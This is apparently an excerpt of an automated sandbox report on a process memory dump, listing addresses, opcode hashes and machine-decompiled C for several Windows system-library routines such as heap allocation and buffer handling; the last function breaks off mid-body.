0x05402db3
0x05402db4
0x05402dbc
0x05402dc3
0x05402dc3
0x053bc205
0x053bc205
0x053bc208
0x053bc20e
0x053bc211
0x053bc216
0x053bc219
0x053bc21f
0x053bc222
0x053bc22c
0x053bc234
0x053bc23a
0x053bc23f
0x053bc245
0x053bc24b
0x053bc251
0x053bc25a
0x053bc276
0x053bc27d
0x053bc27d
0x053bc25c
0x053bc25c
0x00000000
0x053bc25e
0x053bc1a4
0x053bc1aa
0x053bc1b3
0x053bc265
0x053bc26c
0x053bc26c
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 612bbeabec82da2a36faca13ff3cc99d5e22f387d72cab1d6f4ff65c745c8363
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 37314872B0558BBFEB14EBB0C494BEAF769BF42200F14815AD5185B741DBB45E09C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 05417016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E05417016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x548d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E05416B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E05416B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E053B7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E053D9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E053DB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L053B4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x05417016
0x0541701e
0x0541702b
0x05417033
0x05417037
0x0541703c
0x0541703e
0x05417041
0x05417045
0x0541704a
0x05417050
0x05417055
0x0541705a
0x05417062
0x05417062
0x0541705a
0x05417064
0x05417064
0x05417067
0x05417071
0x05417096
0x0541709b
0x054170a2
0x054170a6
0x054170a7
0x054170ad
0x054170b3
0x054170b6
0x054170bb
0x054170c3
0x054170c3
0x054170c6
0x054170cd
0x054170dd
0x054170e0
0x054170e2
0x054170e2
0x054170ee
0x05417101
0x054170f0
0x054170f9
0x054170f9
0x0541710a
0x0541710e
0x05417112
0x05417117
0x05417118
0x05417118
0x054170bb
0x0541711d
0x05417123
0x05417131
0x05417131
0x05417136
0x0541713d
0x0541713e
0x0541713f
0x0541714a
0x0541714a
0x05417084
0x05417088
0x00000000
0x0541708e
0x0541708e
0x05417092
0x00000000
0x05417092

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1ab742b12d539eabf872b0302277516ea14594309f8967d80cef7ee81443540
Instruction ID: 7fde156d25c537693e520808efab766c68674a0e32405a21dca3e335ceb5fcbd
Opcode Fuzzy Hash: a1ab742b12d539eabf872b0302277516ea14594309f8967d80cef7ee81443540
Instruction Fuzzy Hash: D431A2726087519BC320DF28C944AABB7E5FF88700F054A6EFD9697790E730E904C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 053CA70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E053CA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x5487b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x5487b10 = 8;
					 *0x5487b14 = 0x5487b0c;
					 *0x5487b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E053CA990(0x5487b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L053CA840(__edx, __ecx, __ecx, _t52, 0x5487b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x5487b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x5487b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x5487b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L053B4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x5487b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E053DF3E0(_t50,  *0x5487b14, _t8 >> 3);
						_t28 =  *0x5487b14; // 0x77f07b0c
						__eflags = _t28 - 0x5487b0c;
						if(_t28 != 0x5487b0c) {
							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x5487b14 = _t50;
						_t48 = _v12;
						 *0x5487b10 = _t9;
						goto L6;
					}
					 *0x5487b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x053ca713
0x053ca714
0x053ca717
0x053ca71d
0x053ca720
0x053ca722
0x053ca727
0x053ca74a
0x053ca754
0x053ca75e
0x053ca768
0x053ca76a
0x053ca773
0x053ca78b
0x053ca790
0x053ca792
0x053ca741
0x053ca741
0x053ca743
0x053ca749
0x053ca749
0x053ca732
0x053ca73a
0x053ca797
0x053ca79d
0x053ca7a3
0x053ca7a9
0x053ca7b6
0x053ca7bc
0x053ca7ca
0x053ca7e0
0x053ca7e2
0x053ca7e4
0x05409bf2
0x00000000
0x05409bf2
0x053ca7ed
0x053ca7f2
0x053ca800
0x053ca805
0x053ca80d
0x053ca812
0x05409c08
0x05409c08
0x053ca818
0x053ca81b
0x053ca821
0x053ca824
0x00000000
0x053ca824
0x053ca7ae
0x00000000
0x053ca7ae
0x053ca73c
0x053ca73e
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48e354ba352e7322de865966177f92cafa92241b949762f0ff8c4ad5eeced760
Instruction ID: 1174d749423804c89c7e65d1d38089a861d2cd528c2279c18a6e0230c3535aed
Opcode Fuzzy Hash: 48e354ba352e7322de865966177f92cafa92241b949762f0ff8c4ad5eeced760
Instruction Fuzzy Hash: C831EFB16102089BC715CB48D8A9FA97FFBFB84254F28099EE015C7245DBB29D00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 053C61A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E053C61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E053C5E50(0x53767cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E05469D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0539F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x053c61b3
0x053c61b5
0x053c61bd
0x053c61c3
0x053c61c7
0x053c61d2
0x053c61ff
0x053c61ff
0x053c6201
0x053c6207
0x053c6207
0x053c61d4
0x053c61d9
0x00000000
0x00000000
0x053c61df
0x053c61e2
0x00000000
0x00000000
0x053c61e6
0x053c61e8
0x053c61ee
0x053c61ee
0x053c61f9
0x0540762f
0x05407632
0x05407635
0x05407639
0x05407640
0x0540766e
0x05407675
0x00000000
0x00000000
0x05407681
0x05407689
0x0540768d
0x05407691
0x05407695
0x05407699
0x054076af
0x054076b5
0x054076b7
0x054076b7
0x054076d7
0x054076dc
0x00000000
0x054076dc
0x054076a2
0x054076a9
0x05407651
0x05407653
0x05407653
0x05407656
0x05407656
0x00000000
0x05407656
0x05407644
0x05407646
0x05407648
0x05407648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad976aaaacc7313f1510dc32ce30ede46c31630ede1adc4a50b5de9a30604ea0
Instruction ID: 64eda83d9577c9e76751def98ca9def9d9203ce0c3049397bc57c438cd0fa04f
Opcode Fuzzy Hash: ad976aaaacc7313f1510dc32ce30ede46c31630ede1adc4a50b5de9a30604ea0
Instruction Fuzzy Hash: 71317C716097018FD720DF1DC841B66BBE9FB88B10F1549BEE99697391D7B0E804CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0539AA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0539AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x548d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x5487b9c; // 0x0
					_t53 = L053B4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E053DB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E053DF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L053A6C59(_t53, _t51, _t58) != 0) {
							_t28 = E053C5E50(0x537c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E053CB230(_v32, _v28, 0x537c2d8, 1,  &_v24);
								_t28 = E0539F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x0539aa25
0x0539aa29
0x0539aa2d
0x0539aa30
0x0539aa37
0x0539aa3c
0x053f4458
0x053f4458
0x053f4472
0x053f4474
0x053f4476
0x0539aa64
0x0539aa74
0x053f447c
0x053f4483
0x053f4492
0x0539aa52
0x0539aa54
0x0539aa5e
0x053f44a8
0x053f44ad
0x053f44af
0x053f44b6
0x053f44b6
0x053f44b9
0x053f44bc
0x053f44cd
0x053f44d3
0x053f44d6
0x053f44e1
0x053f44e1
0x053f44e6
0x053f44e8
0x053f44fb
0x053f44fb
0x053f44e8
0x00000000
0x0539aa5e
0x053f4476
0x0539aa42
0x0539aa46
0x0539aa48
0x0539aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccc69d20f4c4e4a9c113c01af0660c93d971adf9b34a5d94b60da56b6eb1b5f5
Instruction ID: ddf45665032d80e9b60ea8d001da92f820bc392623ca3047e2a9215382ccc52d
Opcode Fuzzy Hash: ccc69d20f4c4e4a9c113c01af0660c93d971adf9b34a5d94b60da56b6eb1b5f5
Instruction Fuzzy Hash: 6F31E3B2A00219ABDF15EF64CD82ABFB7B9FF04700B054069F901E7150EB799D11DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 053D8EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E053D8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x548d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E053C4E70(0x54886e4, 0x53d9490, 0, 0);
					if( *0x54853e8 > 5 && E053D8F33(0x54853e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x54853e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x54853e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x537bc46;
						_t48 = E05417B9C(0x54853e8, 0x537bc46, _t67, 0x54853e8, _t70,  &_v140);
					}
				}
				return E053DB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x053d8ec7
0x053d8ed9
0x053d8edc
0x053d8ee6
0x053d8ee9
0x053d8eee
0x053d8efc
0x053d8f08
0x05411349
0x05411353
0x0541135d
0x05411366
0x0541136f
0x05411375
0x0541137c
0x05411385
0x05411390
0x05411391
0x0541139c
0x0541139d
0x054113a6
0x054113ac
0x054113b2
0x054113b5
0x054113bc
0x054113bf
0x054113c2
0x054113c5
0x054113c8
0x054113cb
0x054113ce
0x054113d1
0x054113d4
0x054113d7
0x054113da
0x054113dd
0x054113e0
0x054113e3
0x054113e6
0x054113e9
0x054113f6
0x05411400
0x05411400
0x053d8f08
0x053d8f32

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d1d14308dcec423652625662dc8d6394638de711dc332d012b2fb7a3cca46f
Instruction ID: 2eaeb7527edb1210871195f7932e7f682a6de22dd4c7708d2e8268926876b5d5
Opcode Fuzzy Hash: e3d1d14308dcec423652625662dc8d6394638de711dc332d012b2fb7a3cca46f
Instruction Fuzzy Hash: 1441A2B1D003189EDB24CFAAE981AEDFBF9FB48710F9041AEE509A7641D7705A44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 053CE730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E053CE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E053D9670() < 0) {
					L053EDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x5487b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L053B4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M053CE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x053ce730
0x053ce736
0x053ce738
0x053ce73d
0x053ce73e
0x053ce740
0x053ce749
0x053ce765
0x053ce76a
0x053ce76b
0x053ce76c
0x053ce76d
0x053ce76e
0x053ce76f
0x053ce775
0x053ce777
0x053ce77e
0x0540b675
0x053ce784
0x053ce784
0x053ce789
0x053ce7a8
0x053ce7ac
0x053ce807
0x053ce7ae
0x053ce7ae
0x053ce7b1
0x053ce7b4
0x053ce7b9
0x053ce7c0
0x053ce7c4
0x053ce7ca
0x053ce7cc
0x00000000
0x053ce7d3
0x053ce7d6
0x00000000
0x00000000
0x053ce7ff
0x053ce802
0x00000000
0x00000000
0x053ce7f9
0x053ce7fc
0x00000000
0x00000000
0x053ce7f3
0x053ce7f6
0x00000000
0x00000000
0x053ce7ed
0x053ce7f0
0x00000000
0x00000000
0x053ce7e7
0x053ce7ea
0x00000000
0x00000000
0x0540b685
0x0540b688
0x00000000
0x00000000
0x0540b682
0x00000000
0x00000000
0x053ce7cc
0x053ce7d9
0x053ce7dc
0x053ce7de
0x053ce7de
0x053ce7ac
0x053ce7e4
0x053ce74b
0x053ce751
0x053ce759
0x053ce761
0x053ce761

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 056632fee38f053bd399ece51f68f2199e9d863a931d504a5f85b907af6ac035
Instruction ID: 8d565d8975a1b939a0335b51724a8b379d80333b88665e984c6a1d7ed83a8725
Opcode Fuzzy Hash: 056632fee38f053bd399ece51f68f2199e9d863a931d504a5f85b907af6ac035
Instruction Fuzzy Hash: B831A075A14249EFD705CF58D845F9ABBE8FB08314F1482AAF904CB741D671ED80DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 053CBC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E053CBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x5486100; // 0x16
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E053B2280(0xd, 0x1a69f1a0);
				_t41 =  *0x54860f8; // 0x0
				if(_t41 != 0) {
					 *0x54860f8 =  *_t41;
					 *0x54860fc =  *0x54860fc + 0xffff;
				}
				E053AFFB0(_t41, 0x800, 0x1a69f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x54860f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L053B4620(0x5486100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x5486100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x053cbc36
0x053cbc42
0x053cbc45
0x053cbc4a
0x053cbd35
0x00000000
0x00000000
0x00000000
0x00000000
0x053cbc50
0x053cbc50
0x053cbc58
0x053cbc5a
0x053cbc60
0x00000000
0x00000000
0x0540a4f2
0x0540a4f6
0x00000000
0x00000000
0x00000000
0x0540a4fc
0x053cbc79
0x053cbc7e
0x053cbc86
0x053cbd16
0x053cbd20
0x053cbd20
0x053cbc8d
0x053cbc94
0x053cbcbd
0x053cbcca
0x053cbccb
0x053cbccc
0x053cbccd
0x053cbcce
0x053cbcd4
0x053cbcea
0x053cbcee
0x053cbcf2
0x053cbd00
0x053cbd04
0x00000000
0x053cbc96
0x053cbcab
0x053cbcaf
0x053cbd2c
0x053cbd2c
0x053cbd09
0x00000000
0x053cbd09
0x053cbcb1
0x053cbcb5
0x053cbcbb
0x00000000
0x00000000
0x00000000
0x053cbcbb

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d506764be3307d4a3d4beb8da983e4bea05c52fb49a091f7e9ee3a60876c103d
Instruction ID: e1cee1e05fc34c177e7813e2226c175ff540810cfd522c21c8cf9288e7099033
Opcode Fuzzy Hash: d506764be3307d4a3d4beb8da983e4bea05c52fb49a091f7e9ee3a60876c103d
Instruction Fuzzy Hash: A2312136A106119BCB41EF58D482BFABBB9FB28310F4180BDED45DB241EB78DD058B90

Uniqueness

Uniqueness Score: -1.00%

Function 05399100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E05399100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x546f6e8);
				E053ED0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
